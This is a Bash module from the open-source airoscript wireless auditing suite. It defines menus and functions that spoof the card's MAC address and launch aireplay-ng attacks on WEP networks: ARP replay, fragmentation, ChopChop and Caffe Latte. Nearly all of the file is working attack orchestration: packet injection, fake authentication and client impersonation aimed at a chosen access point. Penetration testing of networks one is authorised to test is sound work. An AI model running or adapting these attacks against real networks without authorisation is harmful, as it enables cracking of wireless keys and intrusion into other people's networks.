# Wep attack functions for airoscript
# Copyright (C) 2011 David Francos Cuartero
#        This program is free software; you can redistribute it and/or
#        modify it under the terms of the GNU General Public License
#        as published by the Free Software Foundation; either version 2
#        of the License, or (at your option) any later version.

#        This program is distributed in the hope that it will be useful,
#        but WITHOUT ANY WARRANTY; without even the implied warranty of
#        MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#        GNU General Public License for more details.

#        You should have received a copy of the GNU General Public License
#        along with this program; if not, write to the Free Software
#        Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.

# Warning! at least generic, internal and interface must be loaded before this one!

check_function auth_attacks_fake || source $path/attacks/auth # It depends on auth module ;)
check_function injectmenu || source $path/attacks/injection # It depends on injection module ;)

check_client(){
	[[ $dynamic_client_selection ]] && { auto_scan_clients; select_client; }
	[[ $Client_MAC != ""  ]] && { 
		ifconfig $wificard hw ether $Client_MAC
		directed=1; 
		return 0; 
	} || {
		directed=0;
		ifconfig $wificard hw ether $FAKE_MAC
	}
}

wep_attacks_menu(){
	help_fifo $"${mark}${red}Wep attacks${end}\n"\
		"You're seeing this menu because the network you selected has WEP encryption\n"\
		"Here follows some information about each attack\n"\
		"${red}ARP Replay${end}\n" \
		"Standard arp replay, tries to capture an arp and send it back to the router to generate traffic. If not client selected, it'll launch a fake auth attack to simulate one \n"\
		"${red}Fragmentation ${end}\n"\
		"Initiates a fragmentation attack to obtain 1500 bytes of PRGA. Then it generates a packet and injects it back to the router.\n"\
		"${red}ChopChop  ${end}\n"\
		"Tries to decode a single wep packet via chopchop attack, then it starts an injection attack with that packet.\n"\
		"${red}Caffe Latte${end}\n"\
		"An attack not requering router to be in range, client-directed (useful if you're not close to the ap, but to a client)"


    while true; do $clear 
	    mkmenu $"Attacks using a client"\
            $"ARP replay"\
            $"Fragmentation attack"\
            $"Chopchop attack"\
            $"Caffe latte"\
            $"Return to main menu"

            case $choice in
                1) check_client ;  wep_attacks arpreplay_interactive; break ;;
                2) check_client ;  wep_attacks fragmentation -7; break ;;  
                3) check_client ;  wep_attacks chopchop; break ;;
                4) check_client ;  wep_attacks caffelate; break ;;
                5) $clear; break ;;
                *) error $"Unknown response, try again";;
            esac
    done
}

wep_attacks(){
    $clear
    attack=$1; shift;
	hardclean replay_dec-*.xor
    [[ $attack != menu ]] && { 
		export time_=0;
		capture
	 }
	export time_=1
    wep_attacks_$attack $@
	notification=$attack_notification
    $clear;
}
interactive_wep(){
    if [ "$INTERACTIVE" == 1 ]; then
        read -p $"Enter destination mac: (FF:FF:FF:FF:FF:FF)" INJMAC
        if [ "$INJMAC" = "" ]; then INJMAC=$INJMAC_; fi
        read -p $"Set framecontrol word (hex): (0841) " FT
        if [ "$FT" = "" ]; then FT=$FT_; fi
    else INJMAC=$INJMAC_; FT=$FT_; fi
}


wep_attacks_caffelate(){
	time_=1
	export wait_for_execute=0;
	execute  $"Cafe Latte Attack on: $Host_SSID "\
	   	$AIREPLAY -6 -b $Host_MAC -h $FAKE_MAC -x \
		$INJECTRATE -D $iwifi & 
	auth_attacks_fake
}

wep_attacks_arpreplay_interactive(){
	FT_="0841"; INJMAC_="FF:FF:FF:FF:FF:FF"; interactive_wep;

    if [[ $directed == 1 ]]; then
		time_=1;
		execute $"Interactive Packet Sel on: $Host_SSID" $AIREPLAY $iwifi --interactive -p $FT -c $INJMAC -b $Host_MAC -h $Client_MAC -x $INJECTRATE 
	else
		time_=1;
		execute $"Interactive Packet Sel on: $Host_SSID" $AIREPLAY $iwifi --interactive -p $FT -c $INJMAC -b $Host_MAC -h $FAKE_MAC -x $INJECTRATE 
		auth_attacks_fake 1
	fi
}

wep_attacks_fragmentation(){
    if [[ $directed != 1 ]]; then
		time_=1;
		auth_attacks_fake 
		tail_launched=1
        export wait_for_execute=1; execute $"Fragmentation w/o client" $AIREPLAY -5 -b $Host_MAC -h\
            $FAKE_MAC -k $FRAG_CLIENT_IP -l $FRAG_HOST_IP $iwifi 

		wait_for_execute=0;
    else
		time_=1;
		tail_launched=1
        wait_for_execute=1; execute $"Fragmentation attack" $AIREPLAY -7 -b $Host_MAC -h $Client_MAC\
            -k $FRAG_CLIENT_IP -l $FRAG_HOST_IP $iwifi  
		wait_for_execute=0;
    fi
	AUTO=1 injectmenu frag
}

wep_attacks_chopchop(){
    $clear
	hardclean replay_dec-*.xor

	[[ $directed != 1 ]] && {
		auth_attacks_fake
		tail_launched=1
		export wait_for_execute=1; execute $"Chopchoping at $Host_SSID"\
			$AIREPLAY --chopchop -b $Host_MAC -h $FAKE_MAC $iwifi  
		export wait_for_execute=0;
	} || {
		export wait_for_execute=1; 
		tail_launched=1
		execute $"Directed ChopChoping to $Client_MAC at $Host_SSID"\
			$AIREPLAY  --chopchop -b $Host_MAC -h $Client_MAC $iwifi 
		export wait_for_execute=0;
	}
	AUTO=1 injectmenu chopchop
}
